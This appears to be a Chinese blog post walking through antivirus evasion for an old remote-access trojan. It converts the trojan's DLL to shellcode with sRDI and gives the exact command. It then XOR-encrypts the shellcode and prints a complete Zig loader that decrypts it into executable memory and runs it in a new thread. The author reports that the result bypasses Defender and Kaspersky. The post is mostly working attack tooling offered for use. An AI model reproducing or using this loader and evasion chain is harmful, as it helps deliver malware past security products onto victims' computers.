请注意,本文编写于 558 天前,最后修改于 182 天前,其中某些信息可能已经过时。
免杀两个注意点 静态免杀:加密,编码,分离,远程加载 动态免杀 CS插件Sleepmask,内存里面的加解密,使用冷门WINAPI,奇奇怪怪的函数逃避hook(钩子)
- 首先第一个静态,Zig 远程加载 ,转32位
动态使用内存加解密sgn:相当于给shellcode套了壳,然将整个shellcode加密,再在壳外面加了个解密,这个行为都封装在shellcode里面,二进制程序里面。
- 静态-->静态加解密-->hook
相关项目:
https://github.com/monoxgas/sRDI
突然从工具里面翻出来一个远古远控,产生了免杀的想法。
生成文件有exe和dll格式。分别可以对应两个项目进行shellcode化
Donut:https://github.com/TheWover/donut
Srdi:https://github.com/monoxgas/sRDI
这里选择srdi,选择多文件生成dll文件
bash位置参数:
input_dll 要转换为shellcode的DLL
可选参数:
-h, --help 显示帮助信息并退出
-v, --version 显示程序版本号并退出
-f FUNCTION_NAME, --function-name FUNCTION_NAME
在DllMain之后要调用的函数
-u USER_DATA, --user-data USER_DATA
要传递给目标函数的数据
-c, --clear-header 在加载时清除PE头部信息
-b, --pass-shellcode-base
将shellcode基地址传递给导出函数
-i, --obfuscate-imports
随机化导入依赖项加载顺序
-d IMPORT_DELAY,--import-delay IMPORT_DELAY
加载导入项之间暂停秒数
of OUTPUT_FORMAT,--output-format OUTPUT_FORMAT
shellcode 的输出格式(例如原始、字符串)
使用IDA pro导入dll,查看出口函数名-->fuckyou
python ConvertToShellcode.py -f fuckyou -i -c datelog.dll生成shellcode
用python写一个多字节异或加密
嵌入到稀罕语言zig制作的shellcodeloader里
bashconst std = @import("std");
const win = std.os.windows;
const kernel32 = win.kernel32;
pub const arch = std.Target.Cpu.Arch.i386;
// Define types
const STARTUPINFOW = win.STARTUPINFOW;
const PROCESS_INFORMATION = win.PROCESS_INFORMATION;
const CREATE_SUSPENDED = 0x00000004;
const WINAPI = win.WINAPI;
const FALSE = win.FALSE;
const TRUE = win.TRUE;
const HANDLE = win.HANDLE;
const DWORD = win.DWORD;
const BOOL = win.BOOL;
const SIZE_T = win.SIZE_T;
const LPVOID = win.LPVOID;
const LPCVOID = win.LPCVOID;
const SECURITY_ATTRIBUTES = win.SECURITY_ATTRIBUTES;
const LPDWORD = *DWORD;
const LPPROC_THREAD_ATTRIBUTE_LIST = *anyopaque;
const LPSECURITY_ATTRIBUTES = *anyopaque;
const LPTHREAD_START_ROUTINE = win.LPTHREAD_START_ROUTINE;
const PROCESS_ALL_ACCESS = 0x000F0000 | (0x00100000) | 0xFFFF;
extern "kernel32" fn OpenProcess(dwDesiredAccess: u32, bInheritHandle: u32, dwProcessId: u32) callconv(WINAPI) u32;
extern "kernel32" fn VirtualAllocEx(hProcess: u32, lpAddress: u32, dwSize: u32, flAllocationType: u32, flProtect: u32) callconv(WINAPI) u32;
extern "kernel32" fn WriteProcessMemory(hProcess: u32, lpBaseAddress: u32, lpBuffer: [*]const u8, nSize: u32, lpNumberOfBytesWritten: ?*u32) callconv(WINAPI) u32;
extern "kernel32" fn CreateThread(lpThreadAttributes: ?*anyopaque, dwStackSize: u32, lpStartAddress: u32, lpParameter: ?*anyopaque, dwCreationFlags: u32, lpThreadId: ?*u32) callconv(WINAPI) u32;
extern "kernel32" fn WaitForSingleObject(hHandle: u32, dwMilliseconds: u32) callconv(WINAPI) u32;
pub fn wWinMain(_: win.HINSTANCE, _: ?win.HINSTANCE, _: win.PWSTR, _: c_int) callconv(win.WINAPI) c_int {
var shellcodeX64 = [_]u8{};
Injection(shellcodeX64[0..]);
return 0;
}
fn Injection(shellcode: []u8) void {
const pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, kernel32.GetCurrentProcessId());
const rPtr = VirtualAllocEx(pHandle, 0, shellcode.len, win.MEM_COMMIT, win.PAGE_EXECUTE_READWRITE);
const key = [_]u8{ 0x08, 0x3f, 0x4b, 0x80, 0x94, 0x7b, 0xaf, 0x69, 0xea, 0x00, 0xe2, 0x41 };
xorEncrypt(shellcode[0..], key[0..]);
var bytesWritten: u32 = undefined;
_ = WriteProcessMemory(pHandle, rPtr, shellcode.ptr, shellcode.len, &bytesWritten);
const tHandle = CreateThread(null, 0, rPtr, null, 0, null);
_ = WaitForSingleObject(tHandle, win.INFINITE);
}
fn xorEncrypt(data: []u8, key: []const u8) void {
var j: usize = 0;
for (data) |*value| {
if (j == key.len) j = 0;
value.* ^= key[j];
j += 1;
}
}
丢沙箱看看,还是不太理想,内存被标记烂了。过个defender和卡巴斯基还是可以的
